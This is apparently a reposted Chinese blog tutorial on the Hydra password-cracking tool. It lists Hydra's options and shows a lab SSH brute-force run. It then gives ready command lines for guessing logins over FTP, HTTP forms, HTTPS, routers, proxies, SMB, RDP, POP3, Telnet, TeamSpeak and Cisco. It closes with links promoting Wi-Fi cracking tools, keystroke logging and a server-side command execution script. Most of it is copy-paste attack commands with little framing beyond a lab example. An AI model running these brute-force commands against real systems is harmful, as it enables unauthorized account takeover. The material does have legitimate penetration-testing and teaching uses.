大家好,又见面了,我是你们的朋友全栈君。
目录
九头蛇hydra
记得美国队长中的大反派hydra(九头蛇)组织吗?
hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大
kali下是默认安装的,几乎支持所有协议的在线破解。
密码能否破解,在于字典是否强大以及电脑的性能。
我们就介绍下,这个装备怎么用
使用方法
语法:Hydra 参数 IP 服务参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
4.缺点,如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。案例分析
暴破ssh登录密码
环境介绍
攻击机:kali
装有hydra工具
靶机:192.168.154.131
安装ssh服务,正常运行为了测试方便,我们创建两个简单的字典文件,如下:
开始爆破
根据命令参数,组织参数格式如下:
root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh破解成功
因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。
测试登录
使用得到的用户名/密码登录服务器,登录成功
各种协议破解汇总
FTP协议破解
破解ftp:
hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -vhttp协议破解
get方式提交,破解web登录:
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php
post方式提交,破解web登录:
hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …这个是登录的 url
#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始破解https协议破解
破解https
hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https路由器破解
hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试破解的用户名。
# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)http-proxy协议破解
破解http-proxy:
hydra -l admin -P 字典.txt http-proxy://IP地址smb破解
破解smb:
hydra -l 用户名字典 -P 密码字典 IP地址 smbWindows远程桌面
破解rdp(windows远程登录):
hydra ip地址 rdp -l administrator -P 密码字典.txt -V邮箱pop3
破解邮箱pop3:
hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3telnet破解
hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V语音通讯工具teamspeak
hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeakcisco
hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable推荐阅读
【资源推荐】
-
渗透测试专用系统
- kali-linux-e17-2019.1a-amd64.iso系统镜像
- https://download.csdn.net/download/weixin_42350212/15834456
- kali-linux-2018.4-amd64 操作系统
- https://download.csdn.net/download/weixin_42350212/13733164
- manjaro-xfce-17.1.7-stable-x86_64.iso系统镜像
- https://download.csdn.net/download/weixin_42350212/15834405
- WiFi专用渗透系统 nst-32-11992.x86_64.iso操作系统镜像
- https://download.csdn.net/download/weixin_42350212/15808682
- Parrot-security-4.1_amd64.iso 操作系统镜像
- https://download.csdn.net/download/weixin_42350212/15808365
- manjaro-xfce-17.1.7-stable-x86_64 操作系统
- https://download.csdn.net/download/weixin_42350212/13733286
- cyborg-hawk-linux-v-1.1 操作系统
- https://download.csdn.net/download/weixin_42350212/13733159
-
渗透测试相关工具
- 渗透测试实战专栏
- 【kali常用工具】上网行为监控工具
- https://download.csdn.net/download/weixin_42350212/13985799
- 【kali常用工具】抓包工具Charles Windows64位 免费版
- https://download.csdn.net/download/weixin_42350212/15898652
- 【kali常用工具】图印工具stamp.zip
- https://download.csdn.net/download/weixin_42350212/14980915
- 【kali常用工具】brutecrack工具[WIFIPR中文版]及wpa/wpa2字典
- https://download.csdn.net/download/weixin_42350212/13721381
- 【kali常用工具】EWSA 5.1.282-破包工具
- https://download.csdn.net/download/weixin_42350212/13704097
- 【kali常用工具】Realtek 8812AU KALI网卡驱动及安装教程
- https://download.csdn.net/download/weixin_42350212/13703770
- 【kali常用工具】无线信号搜索工具_kali更新
- https://download.csdn.net/download/weixin_42350212/13703729
- 【kali常用工具】inssider信号测试软件_kali常用工具
- https://download.csdn.net/download/weixin_42350212/13703705
- 【kali常用工具】MAC地址修改工具 保护终端不暴露
- https://download.csdn.net/download/weixin_42350212/13703597
- 【kali常用工具】脚本管理工具 php和jsp页面 接收命令参数 在服务器端执行
- https://download.csdn.net/download/weixin_42350212/13754997
- Java实现照片GPS定位【完整脚本】
- https://download.csdn.net/download/weixin_42350212/20024262
- Python实现照片GPS定位【完整脚本】
- https://download.csdn.net/download/weixin_42350212/19776215
- 女神忘记相册密码 python20行代码打开【完整脚本】
- https://download.csdn.net/download/weixin_42350212/19871942
- python修改证件照底色、大小、背景、抠图【完整源码】
- https://download.csdn.net/download/weixin_42350212/19815306
python实战
- 【python实战】前女友婚礼,python破解婚礼现场的WIFI,把名称改成了
- 【python实战】前女友发来加密的 “520快乐.pdf“,我用python破解开之后,却发现
- 【python实战】昨晚,我用python帮隔壁小姐姐P证件照 自拍,然后发现…
- 【python实战】女友半夜加班发自拍 python男友用30行代码发现惊天秘密
- 【python实战】python你TM太皮了——区区30行代码就能记录键盘的一举一动
- 【python实战】女神相册密码忘记了,我只用Python写了20行代码~~~
【pygame开发实战开发30例 完整源码】
【pygame游戏开发专栏,获取完整源码+教程】
- 一起来学pygame吧 游戏开发30例(二)——塔防游戏
- 一起来学pygame吧 游戏开发30例(四)——俄罗斯方块小游戏
- 渗透测试实战专栏
- Windows AD/Exchange管理专栏
- Linux高性能服务器搭建
- PowerShell自动化专栏
CSDN官方学习推荐 ↓ ↓ ↓
- CSDN出的Python全栈知识图谱,太强了,推荐给大家!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/134322.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...